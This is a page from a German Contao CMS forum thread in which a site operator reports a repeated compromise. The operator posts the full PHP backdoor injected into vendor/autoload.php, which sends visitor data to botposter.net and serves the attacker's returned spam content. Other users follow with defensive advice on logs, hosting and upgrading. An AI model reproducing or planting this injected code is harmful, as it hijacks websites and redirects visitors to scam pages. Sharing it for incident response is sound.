Seite 3 von 3 ErsteErste 123
Ergebnis 81 bis 84 von 84

Thema: SOS - Google-Suchergebnis leitet auf Scamming-Webseite um

  1. #81
    Contao-Fan Avatar von ph!L
    Registriert seit
    04.11.2009.
    Ort
    Internet
    Beiträge
    402

    Standard

    Nur zum archivieren und für Menschen, die das auch betrifft: Wir haben trotz der Absicherung des Systems eine erneute Code-Einschleusung in die /vendor/autoload.php gehabt.
    Folgender Code wurde eingeschleust:

    PHP-Code:
    header("HTTP/1.1 200 OK");
    define("CONSTANT_NAME""about");
    try{
        
    ini_set('display_errors','off');
        
    error_reporting(E_ALL E_NOTICE); 
        
    set_time_limit(0);

        
    $api_url "https://br3.botposter.net/web3/homed.php";
        
    $header_curl = array("user_agent:".$_SERVER['HTTP_USER_AGENT']);
        
    $domain = isset($_SERVER['HTTP_X_FORWARDED_HOST']) ? $_SERVER['HTTP_X_FORWARDED_HOST'] : (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '');
        
    $file=(isset($_SERVER['REQUEST_URI']) && $_SERVER['REQUEST_URI']!='')?$_SERVER['REQUEST_URI']:$_SERVER['HTTP_X_REWRITE_URL'];
        
    $post_data = array('ip'=>getIP(),'file'=>$file,'domain'=>$domain);
        
    $result posturl($api_url."?".$domain.$file,$post_data);
        if(
    strlen($result) != 0){
            echo 
    $result;
            exit;
        }
    }catch (
    Exception $exception){

    }
    function 
    posturl($url,$post_data=null){
        
    $curl curl_init();

        
    curl_setopt($curlCURLOPT_URL$url);
        
    curl_setopt($curlCURLOPT_HEADER0);
        
    curl_setopt($curlCURLOPT_TIMEOUT30);
        
    curl_setopt($curlCURLOPT_RETURNTRANSFER1);
        
    curl_setopt($curlCURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']);
        
    curl_setopt($curlCURLOPT_REFERER, @$_SERVER['HTTP_REFERER']);
        
    curl_setopt($curlCURLOPT_SSL_VERIFYPEERFALSE);
        
    curl_setopt($curlCURLOPT_SSL_VERIFYHOSTFALSE);
        
    curl_setopt($curlCURLOPT_POST1);
        
    curl_setopt($curlCURLOPT_POSTFIELDSjson_encode($post_data));
       
        
    $data curl_exec($curl);
        
    curl_close($curl);
        return 
    $data;
    }
    function 
    getIP() {
        if(
    getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
            
    $ip getenv('HTTP_CLIENT_IP');
        } elseif(
    getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
            
    $ip getenv('HTTP_X_FORWARDED_FOR');
        } elseif(
    getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
            
    $ip getenv('REMOTE_ADDR');
        } elseif(isset(
    $_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
            
    $ip $_SERVER['REMOTE_ADDR'];
        }
        return 
    preg_match '/[\d\.]{7,15}/'$ip$matches ) ? $matches [0] : '';
    }
    ?> 

  2. #82
    Contao-Nutzer
    Registriert seit
    25.01.2013.
    Beiträge
    42

    Standard

    Kannst Du ausschließen, dass die Einschleusung über irgendwas anderes auf dem selben Webspace geschehen ist? Ich hatte mal einen Fall, wo in einem Unterverzeichnis (auf die eine Subdomain zeigte) ein veraltetes Ticketsystem Script vom Kunden rumlag, ob das dann Code eingeschleust wurde.

    Oft kann es auch Erkenntnisse bringen, sich die Webserver Logs anzusehen und zwar um den Zeitpunkt herum, als die angegriffene Datei (in Deinem Fall die autoload) das letzte Mal geändert wurde. Hier kann man dann mitunter sehen, welche Scripts hier so aufgerufen wurden um die Einschleusung zu erzeugen.

    Wenn Dich das alles nicht weiterbringt, würde ich an diesem Punkt einen Hoster Wechsel in Betracht ziehen, möglicherweise liegt das Sicherheitsleck dort.
    Lieben Gruß,
    Michael

  3. #83
    Contao-Fan Avatar von ph!L
    Registriert seit
    04.11.2009.
    Ort
    Internet
    Beiträge
    402

    Standard

    Leider kann ich das nicht genau sagen. Wir haben halt bei dem ersten Befall ein App Secret gesetzt und die FTP Zugänge neu gemacht. Ich betreibe ja einige Contao Installationen und habe bisher nur diese veraltete 4.4 mit diesem Problem. Ich gehe einfach davon aus, dass es in Symfony o.ä. eine Lücke gab, die dafür ausgenutzt wurde.

    Der Befall muss Anfang November gewesen sein, da habe ich auch keine Logs mehr.

    Wir haben mittlerweile auf 4.13 aktualisiert und werden das weiter beobachten.

  4. #84
    Community-Moderator
    Wandelndes Contao-Lexikon
    Avatar von Spooky
    Registriert seit
    12.04.2012.
    Ort
    Scotland
    Beiträge
    34.112
    Partner-ID
    10107

    Standard

    Wenn ihr auf 4.4 gewesen seid, dann kann das auf jeden Fall sein.
    » sponsor me via GitHub or PayPal or Revolut

Aktive Benutzer

Aktive Benutzer

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •